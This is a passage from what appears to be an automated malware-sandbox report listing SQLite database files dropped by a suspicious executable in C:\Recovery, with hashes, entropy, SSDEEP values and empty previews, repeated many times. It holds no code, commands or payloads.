                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
